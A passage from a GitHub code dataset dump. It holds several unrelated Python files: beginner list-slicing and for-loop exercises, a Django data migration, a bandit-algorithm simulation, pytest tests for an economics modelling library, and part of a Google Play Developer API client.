num\n","repo_name":"ckclark/leetcode","sub_path":"py/maximum-swap.py","file_name":"maximum-swap.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24734760496","text":"# Masz listę\n# list_a = [1, 2, 3, 4, 5, 6, 7]\n# Przy pomocy operacji, z którymi zapoznaliśmy się na tej lekcji przekształć daną listę w następujące listy:\n#\n# [1, 3, 5, 7]\n# [2, 4, 6]\n# [7, 6, 5, 4, 3, 2, 1]\n# [6, 4, 2]\n# [1, 7]\n# [7, 4, 1]\n# [] # pusta lista\n# [5, 6, 7]\n\nlist_a = [1, 2, 3, 4, 5, 6, 7]\nlist_b = list_a[::2]\nlist_c = list_a[1::2]\nlist_d = list_a[::-1]\nlist_e = list_a[-2::-2]\nlist_f = list_a[::len(list_a) - 1]\nlist_g = list_a[::-3]\nlist_h = list_a.copy()\nlist_h.clear()\nlist_i = list_a[4:]\n\nprint(f\"{list_a}\\{list_b}\\n{list_c}\\n{list_d}\\n{list_e}\\n{list_f}\\n{list_g}\\n{list_h}\\n{list_i}\")\n\n","repo_name":"Py-Za/basics04","sub_path":"script04.py","file_name":"script04.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24967356725","text":"from pathlib import Path\nimport pandas as pd\n\n\ndef save_preds(\n model, chunksize, pred_path, tourn_path, feature_cols, output=False, save=True\n):\n ids = []\n preds = []\n tourn_iter_csv = pd.read_csv(tourn_path, iterator=True, chunksize=chunksize)\n for chunk in tourn_iter_csv:\n df = chunk[feature_cols]\n out = model.predict(df)\n ids.extend(chunk[\"id\"])\n preds.extend(out)\n tourn_iter_csv.close()\n\n preds_out = pd.DataFrame({\"id\": ids, \"prediction\": preds})\n if save:\n if not ((pred_path.parent).exists()):\n pred_path.parent.mkdir()\n preds_out.to_csv(pred_path, index=False)\n if output:\n return preds_out\n","repo_name":"djliden/numerai_utils","sub_path":"src/utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30976625821","text":"# for (int i = 0; i <= 9; ++i){\n# }\n# for i in range(0, 10): # 0~9\n\n# for i in 0,1,2,3,4,5,6,7,8,9:\n# 코드\n\n# 반복문\n# 정해진 횟수 만큼 특정코드를 실행하도록 만든 문장\n# 파이썬 에서는 for 문과 while 문이 지원\n\nprint('Hello, World!!') # 한번 출력\n\nprint('Hello, World!!') # 3번 출력\nprint('Hello, World!!')\nprint('Hello, World!!')\n\n# 만일, 100번 출력해야 한다면 복붙을 계속할 것인가?\n# 또한, 반복시 출력하는 문구가 변경된다면? 
- 다시 수정\n# 효율적인 반복실행을 위해서 반복문을 사용함\n\n# for 반복변수 in range(시작값, 종료값-1, 증감값):\n# 반복실행할 문장\n\n# range 함수 사용하기\n# range(숫자) - 0 부터 숫자 -1 까지의 범위\nlist(range(10)) # 0~(10-1) 범위\n\n# range(시작, 끝-1) - 시작값부터 끝값-1 까지의 범위\nlist(range(1, 45+1))\n\n# range(시작, 끝-1, 증감값)\n# => 시작값에서 증감값을 처리해서 끝값-1의 범위까지 출력\nlist(range(1, 10, 2))\nlist(range(0, 10, 2))\n\n# ex) 1~100\n# 반복문을 이용한다면?\nlist(range(1, 100+1))\n\nfor i in range(1, 100+1):\n print(i, end=', ') # 출력문 줄바꿈 하지 않기\n# print 함수로 값 출력시 줄바꿈 문자가 자동 추가됨\n# 줄바꿈 문자대신 다른 문자로 대신하려면 end 속성 사용\n\n# ex) 100~1\n# for i in range(1, 100+1):\n# print(i, end=', ')\nlist(range(100, 0, -1))\nfor i in range(100, 0, -1):\n print(i, end=', ')\n\n# ex) 1~100 사이 정수 중 짝수만 출력\nlist(range(2, 100+1, 2))\nfor i in range(2, 100+1, 2):\n print(i, end=', ')\n\nlist(range(1, 100+1))\nfor i in range(1, 100+1):\n if i % 2 == 0: print(i, end=' ')\n\n# 1~100 사이 정수들의 모든 합 계산 출력\nisum = 0\nfor i in range(1, 100+1):\n isum = isum + i\nprint(isum)\n\n# 가우스 덧셈 공식을 이용해서\n# 1~100 사이 정수들의 모든 합 계산 출력\n# x~y 까지의 숫자를 더한 합을 구하는 공식\n# ((x + y) * (y - x + 1)) /2\n((1 + 100) * (100 - 1 + 1)) / 2\n\nrange(1, (100+1)*50)\n\nsum = 0\nfor i in range(1, 51): # 1~100 사이에서 모든 쌍의 합의 전체 개수의 절반인 50개\n sum += i + (101 - i)\nprint(sum)\n\n# 문자열에 반복문 적용하기\n# => 문자열에서 문자를 하나씩 가져와서 출력함\nfor i in 'Hello, World!!':\n print(i, end=' ')\n\n# ex) 단을 입력받아 해당 단의 구구단 출력\ndan = int(input('단?'))\nfor i in range(1, 9+1):\n print(f'{dan} x {i} = {dan * i}')\n\n# p79 ex3) 3의 배수지만 2의 배수는 아닌 정수 출력하고 누적합도 계산해서 출력 (1~100)\nhap = 0\nresult = ''\nfor i in range(1, 100+1):\n if i % 3 == 0 and i % 2 != 0:\n result += str(i) + ' '\n hap += + i\n\nprint(result)\nprint(hap)\n","repo_name":"ktgkid/python39","sub_path":"12for.py","file_name":"12for.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70188050009","text":"from django.db import migrations\nfrom estimation.metaproduct.models import MetaProduct, MetaComponent, MetaService\nfrom estimation.template.models import ProductTemplate\n\ndef create_product_template(apps, schema_editor):\n carbonless_class = MetaProduct.objects.get(name='Carbonless Form')\n callingcard_class = MetaProduct.objects.get(name='Calling Card')\n\n dataset = [\n {'name': 'Carbonless Form 8x11 100s 2ply', \n 'description': 'Carbonless Form 8x11; 100s; 2ply (W/Y); GTO Process;',\n 'meta_product': carbonless_class,\n 'components': [\n {'meta_component': 'Form', 'quantity': 100, \n 'length_value':11, 'width_value':8, 'size_uom':'inch',\n 'machine_option': 'Heidelberg GTO',\n 'meta_material_options': ['Carbonless White', 'Carbonless Yellow']\n },\n {'meta_component': 'Backing', 'quantity': 1, \n 'length_value':11, 'width_value':8, 'size_uom':'inch',\n 'meta_material_options': ['Kraft #80']\n }\n ],\n 'services': [\n {'meta_service': 'Layout', 'input_quantity': 1,\n 'operations': [\n {'name': 'Create Layout', 'options': ['Creatives Layout Operation']}\n ]},\n {'meta_service': 'Form Raw-to-Running Cut',\n 'operations': [\n {'name': 'Cut Sheet', 'options': ['Polar Cutting Operation']}\n ]},\n {'meta_service': 'Backing Raw-to-Running Cut',\n 'operations': [\n {'name': 'Cut Sheet', 'options': ['Polar Cutting Operation']}\n ]},\n {'meta_service': 'Printing',\n 'operations': [\n {'name': 'Front Print', 'options': ['GTO 2-Color Printing']}\n ]},\n {'meta_service': 'Form Running-to-Final Cut',\n 'operations': [\n {'name': 'Cut Sheet', 'options': ['Polar Cutting Operation']}\n ]},\n {'meta_service': 'Gathering',\n 
'operations': [\n {'name': 'Collate Sheets', 'options': ['Finishing Gathering Operation']}\n ]},\n {'meta_service': 'Padding',\n 'operations': [\n {'name': 'Pad Sheets', 'options': ['Finishing Padding Operation']}\n ]}\n ]}\n ]\n\n for template_data in dataset:\n components_data = template_data.pop('components')\n services_data = template_data.pop('services')\n product_template = ProductTemplate.objects.create(**template_data)\n product_class = product_template.meta_product\n\n for component_data in components_data:\n meta_component_name = component_data.pop('meta_component')\n machine_option_name = component_data.pop('machine_option') if 'machine_option' in component_data else None\n material_options = component_data.pop('meta_material_options')\n component_class = product_class.meta_product_datas.get(name=meta_component_name)\n component_class = MetaComponent.objects.get(pk=component_class.pk)\n if machine_option_name is not None:\n machine_option_class = component_class.meta_machine_options.get(machine__name=machine_option_name)\n component_data['machine_option'] = machine_option_class\n\n component_template = product_template.add_component_template(\n meta_component=component_class, **component_data)\n\n for material_option in component_class.meta_material_options.filter(item__name__in=material_options).all():\n component_template.add_material_template(material_option)\n\n for service_data in services_data:\n meta_service_name = service_data.pop('meta_service')\n operations_data = service_data.pop('operations')\n meta_service = product_class.meta_product_datas.get(name=meta_service_name)\n meta_service = MetaService.objects.get(pk=meta_service.pk)\n service_template = product_template.add_service_template(\n meta_service=meta_service, **service_data)\n \n for operation_data in operations_data:\n operation_name = operation_data.pop('name')\n options_data = operation_data.pop('options')\n meta_operation = meta_service.meta_operations.get(name=operation_name)\n operation_template = service_template.add_operation_template(meta_operation=meta_operation)\n\n for option in meta_operation.meta_operation_options.filter(operation__name__in=options_data):\n operation_template.add_operation_option_template(meta_operation_option=option)\n \n\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('estimation', '1002_generate_test_data_productclasses')\n ]\n\n operations = [\n migrations.RunPython(create_product_template, reverse_code=migrations.RunPython.noop),\n ]\n","repo_name":"janlajara/printestimate","sub_path":"estimation/migrations/1003_generate_test_data_producttemplates.py","file_name":"1003_generate_test_data_producttemplates.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13175663730","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport sys\n\n# Sample average formula: Q_{n+1} = Q_n + 1/n * [R_n - Q_n]\n# alpha = 0.1 update formula: Q_{n+1} = Q_n + alpha * [R_n - Q_n]\n\ndef ten_arm_bandit(sample_avg):\n alpha = 0.1\n epsilon = 0.1\n num_iter = 10000\n num_run = 300\n\n # Average reward at each iteration/step\n # Should be normalized by num_run\n # avg_step_reward = [0.0 for x in range(num_iter)]\n avg_step_reward = np.zeros(num_iter)\n # Average ratio of picking up optimal action at each iteration/step\n # Should be normalized by num_run\n # avg_opt_ratio = [0.0 for x in range(num_iter)]\n avg_opt_ratio = np.zeros(num_iter)\n\n for i 
in range(num_run):\n # Start each simulation\n true_values = [0.0 for x in range(10)]\n\n # Number of occurances for each action\n num_action = [0.0 for x in range(10)]\n q_estimate = [0.0 for x in range(10)]\n for j in range(num_iter):\n # Pick the action\n action_idx = -1\n # Perform epsilon greedy action selection\n if random.random() <= epsilon:\n # Randomly pick an action\n action_idx = random.randint(0, 9)\n else:\n max_est = max(q_estimate)\n max_est_idx = [i for i, x in enumerate(q_estimate) if x == max_est]\n action_idx = random.choice(max_est_idx)\n # Perform action\n # Get reward, with noise around the true reward\n r = np.random.normal(true_values[action_idx], 1)\n avg_step_reward[j] += r\n if true_values[action_idx] == max(true_values):\n # If choosing the optimal action\n avg_opt_ratio[j] += 1\n # Update estimate\n num_action[action_idx] += 1\n if sample_avg:\n # Sample average\n q_estimate[action_idx] = q_estimate[action_idx] + \\\n 1/num_action[action_idx] * \\\n (r - q_estimate[action_idx])\n else:\n # const step size\n q_estimate[action_idx] = q_estimate[action_idx] + \\\n alpha * (r - q_estimate[action_idx])\n # Update true values\n for i in range(len(true_values)):\n s = np.random.normal(0, 0.01)\n true_values[i] += s\n # print(s)\n # print(\"{0:.5f}\".format(true_values[0]))\n avg_step_reward[:] = [x / num_run for x in avg_step_reward]\n avg_opt_ratio[:] = [x / num_run for x in avg_opt_ratio]\n\n return avg_step_reward, avg_opt_ratio\n\n\n# fig,axes = plt.subplots(2,1)\n# axes[0].plot(range(1, num_iter + 1), avg_step_reward)\n# axes[1].plot(range(1, num_iter + 1), avg_opt_ratio)\n# plt.show()\n\n# np.savetxt('out.txt', np.array(avg_step_reward))\n# np.savetxt('out.txt', np.array(avg_opt_ratio))\n\n# print(\"{0:.5f}\".format(true_values[0]))\n# print(avg_step_reward)\n\noutput_file = sys.argv[1]\nsample_avg_reward, sample_avg_opt = ten_arm_bandit(True)\nconst_step_reward, const_step_opt = ten_arm_bandit(False)\nnp.savetxt(output_file, np.array([sample_avg_reward, sample_avg_opt, const_step_reward, const_step_opt]))\n# np.savetxt(output_file, np.array(const_step_reward))\n# np.savetxt(output_file, np.array(const_step_opt))\n","repo_name":"Allen-Wu/CS394R-RL","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18493035239","text":"import jax.numpy as jnp\nimport pandas as pd\nimport pytest\nfrom jax import random\nfrom lcm.entry_point import (\n create_compute_conditional_continuation_policy,\n get_lcm_function,\n)\nfrom lcm.example_models import (\n N_CHOICE_GRID_POINTS,\n PHELPS_DEATON,\n PHELPS_DEATON_WITH_FILTERS,\n)\nfrom lcm.logging import get_logger\nfrom lcm.model_functions import get_utility_and_feasibility_function\nfrom lcm.next_state import _get_next_state_function_simulation\nfrom lcm.process_model import process_model\nfrom lcm.simulate import (\n _as_data_frame,\n _compute_targets,\n _generate_simulation_keys,\n _process_simulated_data,\n _retrieve_non_sparse_choices,\n create_choice_segments,\n create_data_scs,\n determine_discrete_dense_choice_axes,\n dict_product,\n filter_ccv_policy,\n simulate,\n)\nfrom lcm.state_space import create_state_choice_space\nfrom numpy.testing import assert_array_almost_equal, assert_array_equal\nfrom pybaum import tree_equal\n\n# ======================================================================================\n# Test simulate using raw inputs\n# 
======================================================================================\n\n\n@pytest.fixture()\ndef simulate_inputs():\n user_model = {**PHELPS_DEATON, \"n_periods\": 1}\n model = process_model(user_model)\n\n _, space_info, _, _ = create_state_choice_space(\n model=model,\n period=0,\n is_last_period=False,\n jit_filter=False,\n )\n\n compute_ccv_policy_functions = []\n for period in range(model.n_periods):\n u_and_f = get_utility_and_feasibility_function(\n model=model,\n space_info=space_info,\n data_name=\"vf_arr\",\n interpolation_options={},\n period=period,\n is_last_period=True,\n )\n compute_ccv = create_compute_conditional_continuation_policy(\n utility_and_feasibility=u_and_f,\n continuous_choice_variables=[\"consumption\"],\n )\n compute_ccv_policy_functions.append(compute_ccv)\n\n return {\n \"state_indexers\": [{}],\n \"continuous_choice_grids\": [\n {\"consumption\": jnp.linspace(1, 100, num=N_CHOICE_GRID_POINTS)},\n ],\n \"compute_ccv_policy_functions\": compute_ccv_policy_functions,\n \"model\": model,\n \"next_state\": _get_next_state_function_simulation(model),\n }\n\n\ndef test_simulate_using_raw_inputs(simulate_inputs):\n params = {\n \"beta\": 1.0,\n \"utility\": {\"delta\": 1.0},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n },\n }\n\n got = simulate(\n params=params,\n vf_arr_list=[None],\n initial_states={\"wealth\": jnp.array([1.0, 50.400803])},\n logger=get_logger(debug_mode=False),\n **simulate_inputs,\n )\n\n assert_array_equal(got.loc[0, :][\"retirement\"], 1)\n assert_array_almost_equal(got.loc[0, :][\"consumption\"], jnp.array([1.0, 50.400803]))\n\n\n# ======================================================================================\n# Test simulate using get_lcm_function\n# ======================================================================================\n\n\n@pytest.fixture()\ndef phelps_deaton_model_solution():\n def _model_solution(n_periods):\n model = {**PHELPS_DEATON, \"n_periods\": n_periods}\n model[\"functions\"] = {\n # remove dependency on age, so that wage becomes a parameter\n name: func\n for name, func in model[\"functions\"].items()\n if name not in [\"age\", \"wage\"]\n }\n solve_model, _ = get_lcm_function(model=model)\n\n params = {\n \"beta\": 1.0,\n \"utility\": {\"delta\": 1.0},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n \"wage\": 1.0,\n },\n }\n\n vf_arr_list = solve_model(params)\n return vf_arr_list, params, model\n\n return _model_solution\n\n\n@pytest.mark.parametrize(\"n_periods\", range(3, PHELPS_DEATON[\"n_periods\"] + 1))\ndef test_simulate_using_get_lcm_function(phelps_deaton_model_solution, n_periods):\n vf_arr_list, params, model = phelps_deaton_model_solution(n_periods)\n\n simulate_model, _ = get_lcm_function(model=model, targets=\"simulate\")\n\n res = simulate_model(\n params,\n vf_arr_list=vf_arr_list,\n initial_states={\n \"wealth\": jnp.array([1.0, 20, 40, 70]),\n },\n additional_targets=[\"utility\", \"consumption_constraint\"],\n )\n\n assert {\n \"value\",\n \"retirement\",\n \"consumption\",\n \"wealth\",\n \"utility\",\n \"consumption_constraint\",\n } == set(res.columns)\n\n # assert that everyone retires in the last period\n last_period_index = n_periods - 1\n assert_array_equal(res.loc[last_period_index, :][\"retirement\"], 1)\n\n # assert that higher wealth leads to higher consumption\n for period in range(n_periods):\n assert (res.loc[period, :][\"consumption\"].diff()[1:] >= 0).all()\n\n # The following does not work. I.e. 
the continuation value in each period is not\n # weakly increasing in wealth. It is unclear if this needs to hold.\n # ------------------------------------------------------------------------------\n # assert jnp.all(jnp.diff(res[period][\"value\"]) >= 0) # noqa: ERA001\n\n\n# ======================================================================================\n# Testing effects of parameters\n# ======================================================================================\n\n\ndef test_effect_of_beta_on_last_period():\n model = {**PHELPS_DEATON, \"n_periods\": 5}\n\n # Model solutions\n # ==================================================================================\n solve_model, _ = get_lcm_function(model=model, targets=\"solve\")\n\n params = {\n \"beta\": None,\n \"utility\": {\"delta\": 1.0},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n },\n }\n\n # low beta\n params_low = params.copy()\n params_low[\"beta\"] = 0.5\n\n # high delta\n params_high = params.copy()\n params_high[\"beta\"] = 0.99\n\n # solutions\n solution_low = solve_model(params_low)\n solution_high = solve_model(params_high)\n\n # Simulate\n # ==================================================================================\n simulate_model, _ = get_lcm_function(model=model, targets=\"simulate\")\n\n initial_wealth = jnp.array([20.0, 50, 70])\n\n res_low = simulate_model(\n params_low,\n vf_arr_list=solution_low,\n initial_states={\"wealth\": initial_wealth},\n )\n\n res_high = simulate_model(\n params_high,\n vf_arr_list=solution_high,\n initial_states={\"wealth\": initial_wealth},\n )\n\n # Asserting\n # ==================================================================================\n last_period_index = 4\n assert (\n res_low.loc[last_period_index, :][\"value\"]\n <= res_high.loc[last_period_index, :][\"value\"]\n ).all()\n\n\ndef test_effect_of_delta():\n model = {**PHELPS_DEATON, \"n_periods\": 5}\n\n # Model solutions\n # ==================================================================================\n solve_model, _ = get_lcm_function(model=model, targets=\"solve\")\n\n params = {\n \"beta\": 1.0,\n \"utility\": {\"delta\": None},\n \"next_wealth\": {\n \"interest_rate\": 0.05,\n },\n }\n\n # low delta\n params_low = params.copy()\n params_low[\"utility\"][\"delta\"] = 0.2\n\n # high delta\n params_high = params.copy()\n params_high[\"utility\"][\"delta\"] = 1.5\n\n # solutions\n solution_low = solve_model(params_low)\n solution_high = solve_model(params_high)\n\n # Simulate\n # ==================================================================================\n simulate_model, _ = get_lcm_function(model=model, targets=\"simulate\")\n\n initial_wealth = jnp.array([20.0, 50, 70])\n\n res_low = simulate_model(\n params_low,\n vf_arr_list=solution_low,\n initial_states={\"wealth\": initial_wealth},\n )\n\n res_high = simulate_model(\n params_high,\n vf_arr_list=solution_high,\n initial_states={\"wealth\": initial_wealth},\n )\n\n # Asserting\n # ==================================================================================\n for period in range(5):\n assert (\n res_low.loc[period, :][\"consumption\"]\n <= res_high.loc[period, :][\"consumption\"]\n ).all()\n assert (\n res_low.loc[period, :][\"retirement\"]\n >= res_high.loc[period, :][\"retirement\"]\n ).all()\n\n\n# ======================================================================================\n# Helper functions\n# ======================================================================================\n\n\ndef 
test_generate_simulation_keys():\n key = jnp.arange(2, dtype=\"uint32\") # PRNG dtype\n stochastic_next_functions = [\"a\", \"b\"]\n got = _generate_simulation_keys(key, stochastic_next_functions)\n # assert that all generated keys are different from each other\n matrix = jnp.array([key, got[0], got[1][\"a\"], got[1][\"b\"]])\n assert jnp.linalg.matrix_rank(matrix) == 2\n\n\ndef test_as_data_frame():\n processed = {\n \"value\": -6 + jnp.arange(6),\n \"a\": jnp.arange(6),\n \"b\": 6 + jnp.arange(6),\n }\n got = _as_data_frame(processed, n_periods=2)\n expected = pd.DataFrame(\n {\n \"period\": [0, 0, 0, 1, 1, 1],\n \"initial_state_id\": [0, 1, 2, 0, 1, 2],\n **processed,\n },\n ).set_index([\"period\", \"initial_state_id\"])\n pd.testing.assert_frame_equal(got, expected)\n\n\ndef test_compute_targets():\n processed_results = {\n \"a\": jnp.arange(3),\n \"b\": 1 + jnp.arange(3),\n \"c\": 2 + jnp.arange(3),\n }\n\n def f_a(a, params):\n return a + params[\"delta\"]\n\n def f_b(b, params): # noqa: ARG001\n return b\n\n model_functions = {\"fa\": f_a, \"fb\": f_b, \"fc\": lambda _: None}\n\n got = _compute_targets(\n processed_results=processed_results,\n targets=[\"fa\", \"fb\"],\n model_functions=model_functions,\n params={\"delta\": -1.0},\n )\n expected = {\n \"fa\": jnp.arange(3) - 1.0,\n \"fb\": 1 + jnp.arange(3),\n }\n assert tree_equal(expected, got)\n\n\ndef test_process_simulated_data():\n simulated = [\n {\n \"value\": jnp.array([0.1, 0.2]),\n \"states\": {\"a\": jnp.array([1, 2]), \"b\": jnp.array([-1, -2])},\n \"choices\": {\"c\": jnp.array([5, 6]), \"d\": jnp.array([-5, -6])},\n },\n {\n \"value\": jnp.array([0.3, 0.4]),\n \"states\": {\n \"b\": jnp.array([-3, -4]),\n \"a\": jnp.array([3, 4]),\n },\n \"choices\": {\n \"d\": jnp.array([-7, -8]),\n \"c\": jnp.array([7, 8]),\n },\n },\n ]\n expected = {\n \"value\": jnp.array([0.1, 0.2, 0.3, 0.4]),\n \"c\": jnp.array([5, 6, 7, 8]),\n \"d\": jnp.array([-5, -6, -7, -8]),\n \"a\": jnp.array([1, 2, 3, 4]),\n \"b\": jnp.array([-1, -2, -3, -4]),\n }\n\n got = _process_simulated_data(simulated)\n assert tree_equal(expected, got)\n\n\ndef test_retrieve_non_sparse_choices():\n got = _retrieve_non_sparse_choices(\n index=jnp.array([0, 3, 7]),\n grids={\"a\": jnp.linspace(0, 1, 5), \"b\": jnp.linspace(10, 20, 6)},\n grid_shape=(5, 6),\n )\n assert_array_equal(got[\"a\"], jnp.array([0, 0, 0.25]))\n assert_array_equal(got[\"b\"], jnp.array([10, 16, 12]))\n\n\ndef test_filter_ccv_policy():\n ccc_policy = jnp.array(\n [\n [0, 1],\n [1, 0],\n ],\n )\n dense_argmax = jnp.array([0, 1])\n dense_vars_grid_shape = (2,)\n got = filter_ccv_policy(\n ccv_policy=ccc_policy,\n dense_argmax=dense_argmax,\n dense_vars_grid_shape=dense_vars_grid_shape,\n )\n assert jnp.all(got == jnp.array([0, 0]))\n\n\ndef test_create_data_state_choice_space():\n model = process_model(PHELPS_DEATON_WITH_FILTERS)\n got_space, got_segment_info = create_data_scs(\n states={\n \"wealth\": jnp.array([10.0, 20.0]),\n \"lagged_retirement\": jnp.array([0, 1]),\n },\n model=model,\n )\n assert got_space.dense_vars == {}\n assert_array_equal(got_space.sparse_vars[\"wealth\"], jnp.array([10.0, 10.0, 20.0]))\n assert_array_equal(got_space.sparse_vars[\"lagged_retirement\"], jnp.array([0, 0, 1]))\n assert_array_equal(got_space.sparse_vars[\"retirement\"], jnp.array([0, 1, 1]))\n assert_array_equal(got_segment_info[\"segment_ids\"], jnp.array([0, 0, 1]))\n assert got_segment_info[\"num_segments\"] == 2\n\n\ndef test_choice_segments():\n got = create_choice_segments(\n mask=jnp.array([True, 
False, True, False, True, False]),\n n_sparse_states=2,\n )\n assert_array_equal(jnp.array([0, 0, 1]), got[\"segment_ids\"])\n assert got[\"num_segments\"] == 2\n\n\ndef test_choice_segments_weakly_increasing():\n key = random.PRNGKey(12345)\n n_states, n_choices = random.randint(key, shape=(2,), minval=1, maxval=100)\n mask_len = n_states * n_choices\n mask = random.choice(key, a=2, shape=(mask_len,), p=jnp.array([0.5, 0.5]))\n got = create_choice_segments(mask, n_sparse_states=n_states)[\"segment_ids\"]\n assert jnp.all(got[1:] - got[:-1] >= 0)\n\n\ndef test_dict_product():\n d = {\"a\": jnp.array([0, 1]), \"b\": jnp.array([2, 3])}\n got_dict, got_length = dict_product(d)\n exp = {\"a\": jnp.array([0, 0, 1, 1]), \"b\": jnp.array([2, 3, 2, 3])}\n assert got_length == 4\n for key, val in exp.items():\n assert_array_equal(got_dict[key], val)\n\n\ndef test_determine_discrete_dense_choice_axes():\n variable_info = pd.DataFrame(\n {\n \"is_state\": [True, True, False, True, False, False],\n \"is_dense\": [False, True, True, False, True, True],\n \"is_choice\": [False, False, True, True, True, True],\n \"is_continuous\": [False, True, False, False, False, True],\n },\n )\n got = determine_discrete_dense_choice_axes(variable_info)\n assert got == (1, 2)\n","repo_name":"OpenSourceEconomics/lcm","sub_path":"tests/test_simulate.py","file_name":"test_simulate.py","file_ext":"py","file_size_in_byte":14093,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"73664490971","text":"\"\"\"Google services.\"\"\"\nfrom asyncio import create_task\nfrom enum import IntEnum, unique\nfrom typing import AsyncContextManager, Dict, List, Optional, Type, TypeVar\n\nimport attr\nfrom aiohttp import ClientSession\nfrom cattr import Converter\nfrom jwt import encode\nfrom pendulum import DateTime, from_timestamp\nfrom ujson import loads\n\nfrom pyrseia import ClientAdapter, create_client, rpc\nfrom pyrseia.aiohttp import aiohttp_client_adapter\nfrom pyrseia.wire import Call\n\n# Scope for purchases: https://www.googleapis.com/auth/androidpublisher\nBASE_URL = \"https://www.googleapis.com/androidpublisher/v3/applications\"\nACCESS_TOKEN_GRANT_TYPE = \"urn:ietf:params:oauth:grant-type:jwt-bearer\"\nSCOPE_ANDROIDPUBLISHER = \"https://www.googleapis.com/auth/androidpublisher\"\nconverter = Converter()\n\n\n@attr.s(auto_attribs=True)\nclass ServiceAccountCredentials:\n project_id: str\n auth_uri: str\n token_uri: str\n client_email: str\n private_key: str\n\n @classmethod\n def from_filename(cls, filename: str):\n with open(filename) as f:\n return converter.structure(loads(f.read()), cls)\n\n\n@attr.s(auto_exc=True, auto_attribs=True)\nclass HttpError(Exception):\n status_code: int\n response_payload: bytes\n\n\n@attr.s(auto_exc=True, auto_attribs=True)\nclass ParseError(Exception):\n payload: bytes\n\n\n@attr.s(slots=True, frozen=True)\nclass ProductPurchase:\n @unique\n class AcknowledgementState(IntEnum):\n NOT_ACKED = 0\n ACKED = 1\n\n @unique\n class ConsumptionState(IntEnum):\n NOT_CONSUMED = 0\n CONSUMED = 1\n\n @unique\n class PurchaseState(IntEnum):\n PURCHASED = 0\n CANCELED = 1\n PENDING = 2\n\n @unique\n class PurchaseType(IntEnum):\n TEST = 0\n PROMO = 1\n REWARDED = 2\n\n kind: str = attr.ib()\n acknowledgementState: AcknowledgementState = attr.ib()\n consumptionState: ConsumptionState = attr.ib()\n developerPayload: str = attr.ib()\n orderId: str = attr.ib()\n purchaseState: PurchaseState = attr.ib()\n purchaseTimeMillis: int = attr.ib()\n 
purchaseType: Optional[PurchaseType] = attr.ib(default=None)\n\n\n@attr.s(slots=True, frozen=True)\nclass VoidedPurchase:\n @unique\n class VoidedSource(IntEnum):\n USER = 0\n DEVELOPER = 1\n GOOGLE = 2\n\n @unique\n class VoidedReason(IntEnum):\n OTHER = 0\n REMORSE = 1\n NOT_RECEIVED = 2\n DEFECTIVE = 3\n ACCIDENTAL_PURCHASE = 4\n FRAUD = 5\n FRIENDLY_FRAUD = 6\n CHARGEBACK = 7\n\n kind: str = attr.ib()\n purchaseToken: str = attr.ib()\n purchaseTimeMillis: str = attr.ib()\n voidedTimeMillis: str = attr.ib()\n orderId: str = attr.ib()\n voidedSource: VoidedSource = attr.ib()\n voidedReason: VoidedReason = attr.ib()\n\n @property\n def purchase_time(self) -> DateTime:\n return from_timestamp(float(self.purchaseTimeMillis) / 1000)\n\n @property\n def voided_time(self) -> DateTime:\n return from_timestamp(float(self.voidedTimeMillis) / 1000)\n\n\n@attr.s(slots=True, frozen=True)\nclass VoidedPurchasesResponse:\n @attr.s(slots=True, frozen=True)\n class TokenPagination:\n nextPageToken: str = attr.ib()\n\n voidedPurchases: List[VoidedPurchase] = attr.ib()\n tokenPagination: Optional[TokenPagination] = attr.ib(default=None)\n\n\nclass GooglePlayDeveloperApi:\n @rpc\n async def get_purchases_products(\n self, package_name: str, product_id: str, token: str\n ) -> ProductPurchase:\n ...\n\n @rpc\n async def get_voided_purchases(\n self,\n package_name: str,\n start_time: Optional[int],\n end_time: Optional[int],\n token: Optional[str],\n type: int,\n ) -> VoidedPurchasesResponse:\n ...\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True)\nclass AccessToken:\n access_token: str\n token_type: str\n expires_in: int\n\n\nasync def request_access_token(\n session: ClientSession,\n url: str,\n creds: ServiceAccountCredentials,\n now: Optional[DateTime] = None,\n) -> AccessToken:\n now = now or DateTime.utcnow()\n assertion = encode(\n {\n \"iss\": creds.client_email,\n \"scope\": SCOPE_ANDROIDPUBLISHER,\n \"aud\": creds.token_uri,\n \"iat\": int(now.timestamp()),\n \"exp\": int(now.add(hours=1).timestamp()),\n },\n creds.private_key,\n algorithm=\"RS256\",\n ).decode(\"utf8\")\n\n async with session.post(\n url,\n data={\"grant_type\": ACCESS_TOKEN_GRANT_TYPE, \"assertion\": assertion},\n ) as resp:\n payload = await resp.read()\n if resp.status != 200:\n raise HttpError(resp.status, payload)\n return converter.structure(loads(payload), AccessToken)\n\n\nasync def invoke_api(\n session: ClientSession,\n token: str,\n url: str,\n query_params: Dict[str, str] = {},\n) -> bytes:\n async with session.get(\n url, params=query_params, headers={\"Authorization\": f\"Bearer {token}\"}\n ) as resp:\n resp_payload = await resp.read()\n if resp.status != 200:\n raise HttpError(resp.status, resp_payload)\n return resp_payload\n\n\nT = TypeVar(\"T\")\n\n\ndef google_client_network_adapter(\n creds: ServiceAccountCredentials,\n) -> AsyncContextManager[ClientAdapter]:\n token = None\n task = None\n\n async def sender(\n session: ClientSession, call: Call, resp_type: Type[T]\n ) -> T:\n nonlocal task, token\n if token is None:\n created_task = False\n if task is None:\n created_task = True\n task = create_task(\n request_access_token(session, creds.token_uri, creds)\n )\n local_task = task # 'task' will get cleaned 